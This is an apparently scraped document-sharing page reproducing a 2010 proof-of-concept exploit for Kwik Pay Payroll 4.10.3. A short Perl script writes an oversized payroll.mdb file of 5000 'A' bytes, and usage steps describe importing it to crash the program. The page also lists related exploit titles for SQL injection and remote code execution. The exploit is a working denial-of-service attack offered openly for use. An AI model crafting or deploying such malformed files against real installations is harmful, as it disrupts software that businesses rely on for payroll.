Kwik Pay Payroll v4.10.3 .mdb Crash PoC

W
Document Sample
scope of work template
							                                          Kwik Pay Payroll v4.10.3 .mdb Crash PoC   Page 1/1
  1     # Exploit Title: Kwik Pay Payroll .mdb Crash PoC
  2     # Date: April 1, 2010
  3     # Version: 4.10.3
  4     # Tested on: Windows XP SP3
  5     # Cost: 100.00 AU
  6     # Author: chap0
  7     # Email: chap0x90[at]gmail[dot]com
  8     # Site: [http://www.setfreesecurity.com]
  9     #
  10    # Usage: Run Script, Open the program
  11    # File −> Import Payroll Data
  12    # Select From Data Source Drop−Down: Kwik−Pay Payroll Data
  13    # Browse and Import your .mdb File
  14    #
  15    # **********************************************
  16    # ** It took 33 years to save my life         **
  17    # ** thats 11 more years to make things right **
  18    # **********************************************
  19    # My hat goes off to the Exploit−DB Crew!
  20    #!/usr/bin/perl
  21    print "Broke as a Joke. . .\n";
  22
  23    my $data = "\x41" x 5000;
  24    my $money = "payroll.mdb";
  25
  26    open (FILE, ">$money");
  27    print FILE "$data";
  28
  29    print "\nShow me the money!\n";
  30
  31




chap0                                                                               04/01/2010

						
Related docs
Other docs by h3m4n
QuickTeam 2.2 SQL injection
Views: 27  |  Downloads: 0
csinf
Views: 0  |  Downloads: 0
catanf
Views: 0  |  Downloads: 0
SCart 2.0 page Remote Code Execution Exploit
Views: 52  |  Downloads: 0